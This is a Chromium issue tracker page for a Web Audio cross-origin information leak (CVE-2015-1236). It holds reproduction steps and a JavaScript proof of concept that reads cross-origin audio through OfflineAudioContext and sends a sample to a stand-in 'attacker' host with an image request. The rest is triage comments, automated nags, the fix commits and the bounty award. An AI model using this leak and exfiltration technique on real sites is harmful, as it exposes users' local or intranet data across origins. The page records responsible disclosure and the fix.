New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 313939 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Feb 2015
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security
Nag



Sign in to add a comment

Security: Cross-origin information disclosure through createMediaElementSource and OfflineAudioContext

Reported by amit...@gmail.com, Oct 31 2013

Issue description

VULNERABILITY DETAILS
An attacker may read an audio file (or a conversion of that file to an audio buffer), overriding cross origin checks.
This, for example, may allow sending to the attacker the contents of a file stored on the local machine or on the intranet to a remote computer.


VERSION
Chrome Version: [30.0.1599.114 stable, 30.0.1599.101 m]
Operating System: [Linux - Ubuntu  12.10 64bit, Windows 7 (VM)]

REPRODUCTION CASE
To reproduce with javascript:
1. Create an audio element
2. Set its source to a media file on a different origin (i.e. different domain) than the executing file.
3. Create a webkitOfflineAudioContext (context)
4. on the context, call createMediaElementSource of the audio element, creating a source node
5. connect the source node to the context.destination
6. play the audio and start rendering the context
7. when rendering is done, send the rendered output buffer to the attacker.

A similar vulnerability can be achieved by using webKitAudioContext and a scriptProccessor node to collect the data from the MediaElementAudioSource node.

Did not find (or looked for) a way to escalate this vulnerability beyond valid media files.

Following is a javascript reproduction of this. Change the src to a valid audio file src.
// =========== Start script
var src = 'http://192.168.1.83:8001/webaudio/resources/sin_440Hz_-6dBFS_1s.wav';
var sampleRate = 44100.0;
var lengthInSeconds = 2;

var context = null, audio = null, source = null;
var actualBuffer = null;


context = new webkitOfflineAudioContext(2, sampleRate * lengthInSeconds, sampleRate);
var audio = document.createElement('audio');
audio.src = src;
var source = context.createMediaElementSource(audio);
source.connect(context.destination);

audio.addEventListener("playing", function(e) {
  console.log("playing", e);
  context.startRendering();
});  

context.oncomplete = function(e) {
    console.log(e.renderedBuffer);
    // Just a demonstration of sending the data, sending the second sample
    var img = document.createElement('img');
    img.src = 'http://attacker/collectData?=' + e.renderedBuffer.getChannelData(0)[1];
    document.body.appendChild(img);
}

audio.play();

// ================= End script
 
Cc: abarth@chromium.org tsepez@chromium.org
Owner: kbr@chromium.org
Repro'd on chrome 32 linux. A quick read of http://www.w3.org/TR/webaudio/ didn't turn up spec'd origin-related behaviour for createMediaElementSource(). This does seem like an major omission in the spec, since prior to the introduction of this feature, the data would have had to have been retrieved via XHR and subject to its restrictions.

Assigning to kbr@ per webaudio/OWNERS. We can fix the bug, but the spec needs to be fixed as well.



Comment 2 by kbr@chromium.org, Nov 1 2013

Cc: kbr@chromium.org
Owner: rtoy@chromium.org
Status: Assigned

Comment 3 by jww@chromium.org, Nov 1 2013

Labels: Security_Impact-None Security_Severity-Medium OS-All
Labels: -Security_Impact-None Security_Impact-Stable Security_Impact-Beta M-30
Wrong label - Security_Impact-None. c#0 says it impacts stable.
Project Member

Comment 5 by ClusterFuzz, Nov 1 2013

Labels: reward-topanel
Project Member

Comment 6 by ClusterFuzz, Nov 1 2013

Labels: Pri-1
Fixing bug priority based on security_severity-* and releaseblock-* labels.

Comment 7 by kbr@chromium.org, Nov 1 2013

Regarding changes to the Web Audio Spec: it's fine for Web Audio to play cross-origin media. It's just not okay to allow readback of that data via OfflineAudioContext. I think the only mechanism that's needed is to detect whether a cross-origin source is connected to a graph whose destination is an OfflineAudioContext, or vice versa, and to throw an exception at that point to prevent the operation.

Comment 8 by amit...@gmail.com, Nov 1 2013

Another mechanism that a similar information disclosure is available with is the a ScriptProcessor node (through AudioContext or OfflineAudioContext) as I wrote in comment #0. 
AnalyzerNode may disclose some information as well, but I don't know if cross origin should be prevented.

Comment 9 by amit...@gmail.com, Nov 1 2013

* AnalyserNode that is.
Project Member

Comment 10 by ClusterFuzz, Nov 1 2013

Adding area label based on an intelligent guess!

- Your friendly ClusterFuzz
Project Member

Comment 11 by ClusterFuzz, Nov 1 2013

Labels: Cr-Internals-Media
Adding area label based on an intelligent guess!

- Your friendly ClusterFuzz

Comment 12 Deleted

Project Member

Comment 13 by ClusterFuzz, Nov 13 2013

Labels: -M-30 M-31
Migrating old milestone labels.
Project Member

Comment 14 by ClusterFuzz, Nov 18 2013

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!)

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz

Comment 15 by rtoy@chromium.org, Nov 19 2013

I think I know how to solve this. Can someone provide a pointer if there's a function in Blink to determine if the origins are the same?
@rtoy - SecurityOrigin::canAccess().
Project Member

Comment 17 by ClusterFuzz, Nov 28 2013

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

- Your friendly ClusterFuzz
Project Member

Comment 18 by ClusterFuzz, Dec 7 2013

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 19 by ClusterFuzz, Dec 15 2013

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 20 by ClusterFuzz, Dec 23 2013

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 21 by ClusterFuzz, Jan 1 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 22 by ClusterFuzz, Jan 9 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 23 by ClusterFuzz, Jan 9 2014

Labels: -M-31 M-32
Project Member

Comment 24 by ClusterFuzz, Jan 17 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 25 by ClusterFuzz, Jan 26 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 26 by ClusterFuzz, Feb 3 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 27 by ClusterFuzz, Feb 12 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 28 by ClusterFuzz, Feb 17 2014

Labels: -M-32 M-33
Project Member

Comment 29 by ClusterFuzz, Feb 20 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 30 by ClusterFuzz, Mar 1 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 31 by ClusterFuzz, Mar 9 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 32 by ClusterFuzz, Mar 17 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 33 by ClusterFuzz, Mar 26 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 34 by ClusterFuzz, Mar 31 2014

Labels: -M-33 M-34
Project Member

Comment 35 by ClusterFuzz, Apr 3 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 36 by ClusterFuzz, Apr 12 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 37 by ClusterFuzz, Apr 20 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 38 by ClusterFuzz, Apr 28 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz

Comment 39 by rtoy@chromium.org, Apr 29 2014

Cc: cwilso@chromium.org
+cwilso
Project Member

Comment 40 by ClusterFuzz, May 13 2014

Labels: -M-34 M-35
rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 41 by ClusterFuzz, May 22 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 42 by ClusterFuzz, May 30 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 43 by ClusterFuzz, Jun 7 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 44 by ClusterFuzz, Jun 16 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 45 by ClusterFuzz, Jun 23 2014

Labels: -M-35 M-36
Project Member

Comment 46 by ClusterFuzz, Jun 24 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 47 by ClusterFuzz, Jul 3 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Have you had a chance to look at this, rtoy? This bug has been open for a long while without much activity.
Project Member

Comment 49 by ClusterFuzz, Jul 11 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 50 by ClusterFuzz, Jul 20 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 51 by ClusterFuzz, Jul 28 2014

Labels: -Security_Impact-Beta
rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
rtoy: Any updates?
Project Member

Comment 53 by ClusterFuzz, Aug 9 2014

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz

Comment 54 by rtoy@chromium.org, Aug 12 2014

Labels: WIP
Working on refactoring AudioContext to support this.
Project Member

Comment 55 by ClusterFuzz, Aug 18 2014

Labels: -M-36 M-37
Project Member

Comment 56 by ClusterFuzz, Sep 29 2014

Labels: -M-37 M-38
Project Member

Comment 57 by ClusterFuzz, Nov 8 2014

Labels: -M-38 M-39
rtoy: Is the refactoring work for AudioContext finished? Can you provide another update? Thanks.
Labels: -WIP
What is status on the refactoring work ? If WIP, please readd WIP label.
Labels: -M-39 M-40
No more M39 patches, moving to M40.
Project Member

Comment 61 by ClusterFuzz, Jan 7 2015

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 147 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Hi, would you mind giving an update on the progress on this bug?
Project Member

Comment 63 by ClusterFuzz, Jan 29 2015

rtoy@: Uh oh! This issue is still open and hasn't been updated in the last 168 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Project Member

Comment 64 by bugdroid1@chromium.org, Feb 4 2015

The following revision refers to this bug:
  http://src.chromium.org/viewvc/blink?view=rev&rev=189527

------------------------------------------------------------------
r189527 | rtoy@chromium.org | 2015-02-04T20:29:09.909610Z

Changed paths:
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-allowed.html?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio/compatibility.js?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio/media-element-cross-origin-allow.php?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-same-origin.html?r1=189527&r2=189526&pathrev=189527
   M http://src.chromium.org/viewvc/blink/trunk/Source/modules/webaudio/MediaElementAudioSourceNode.cpp?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-allowed-expected.txt?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin.html?r1=189527&r2=189526&pathrev=189527
   M http://src.chromium.org/viewvc/blink/trunk/Source/modules/webaudio/AudioContext.cpp?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-with-credentials.html?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-same-origin-expected.txt?r1=189527&r2=189526&pathrev=189527
   M http://src.chromium.org/viewvc/blink/trunk/Source/modules/webaudio/AudioContext.h?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio/js-test.js?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-expected.txt?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio/laughter.wav?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-with-credentials-expected.txt?r1=189527&r2=189526&pathrev=189527
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/resources/webaudio/media-element-audio-source-node-test.js?r1=189527&r2=189526&pathrev=189527

Output silence if the MediaElementAudioSourceNode has a different origin

See http://webaudio.github.io/web-audio-api/#security-with-mediaelementaudiosourcenode-and-cross-origin-resources

Two new tests added for the same origin and a cross origin source.

BUG= 313939 

Review URL: https://codereview.chromium.org/520433002
-----------------------------------------------------------------
Can this be marked fixed?
Cc: timwillis@chromium.org
hey rtoy@ - please advise whether we can mark this as fixed. From the patchset it looks like it's good to go, but grateful for your confirmation.

Comment 67 by rtoy@chromium.org, Feb 11 2015

Sorry, it got reverted on Friday because it was causing lots of crashes because I forgot to check a condition.  I have a fix for that and will try to land it tomorrow.  
Cool - thanks for the update.
rtoy@ - checking in here. When can you land for your fix from #67?
Project Member

Comment 70 by bugdroid1@chromium.org, Feb 17 2015

The following revision refers to this bug:
  http://src.chromium.org/viewvc/blink?view=rev&rev=190367

------------------------------------------------------------------
r190367 | rtoy@chromium.org | 2015-02-17T23:49:51.787580Z

Changed paths:
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-with-credentials.html?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-allowed.html?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-same-origin-expected.txt?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-expected.txt?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-same-origin.html?r1=190367&r2=190366&pathrev=190367
   M http://src.chromium.org/viewvc/blink/trunk/Source/modules/webaudio/MediaElementAudioSourceNode.cpp?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-with-credentials-expected.txt?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin-allowed-expected.txt?r1=190367&r2=190366&pathrev=190367
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/http/tests/security/media-element-audio-source-node-cross-origin.html?r1=190367&r2=190366&pathrev=190367

Check for valid webMediaPlayer() before using it.

This fixes the underlying issue in bug 456312 and reverts the revert in
https://codereview.chromium.org/905023002, adding the fix and the layout tests back.

Manually tested by visiting youtube.com and clicking on videos, before the current video is finished. This requires the Audio EQ (HTML5 Audio Equalizer for Chrome) extension to be added and enabled.

BUG=456312,  313939 

Review URL: https://codereview.chromium.org/905393002
-----------------------------------------------------------------
rtoy@: Is there any work remaining? Can we close this issue as fixed now? 
Status: Started

Comment 73 by rtoy@chromium.org, Feb 18 2015

#70 has the fix that we want. I think this is done now.
Labels: -M-40 M-41 Merge-Triage
Status: Fixed
Thanks!
Project Member

Comment 75 by ClusterFuzz, Feb 19 2015

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: -M-41 -Merge-Triage M-42 Release-0-M42 Merge-NA
Based on revision number in #70 (190367), this is already in M42 and it doesn't make the threshold for a patch to M41.
Labels: -reward-topanel reward-unpaid reward-4000 CVE-2015-1236
Congratulations - $4000 reward for this report.

Notes from panel: Textbook infoleak with great reproduction steps.

Someone from our finance area should be in touch within the next two weeks to arrange payment. If you haven't heard from anyone by then, please contact me directly.

You'll be credit in our release notes as amitayd. Please let me know if you'd like to use another name.

Thanks,
Tim

*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an established charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************

Comment 78 by amit...@gmail.com, Apr 14 2015

Thank you, great surprise this morning!

You can credit me in the release notes as Amitay Dobo.

Thanks for doing a great job on Chromium,
Amitay

Comment 79 by amit...@gmail.com, Apr 28 2015

Sorry for polluting the issue with administration, but couldn't reveal timwil...@gmail.com full email using the captcha and contact you directly.

I wasn't contacted yet by anyone from finance yet, please contact me or let someone contact me.

Best,
Amitay Dobo ( amitayd@gmail.com )
Emailed Amitay.
Labels: -reward-unpaid reward-inprocess
Project Member

Comment 82 by ClusterFuzz, May 28 2015

Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.
Labels: -reward-inprocess
Processing via our e-payment system can take up to two weeks, but the reward should be on its way to you. Thanks again for your help!
Project Member

Comment 84 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 85 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted

Sign in to add a comment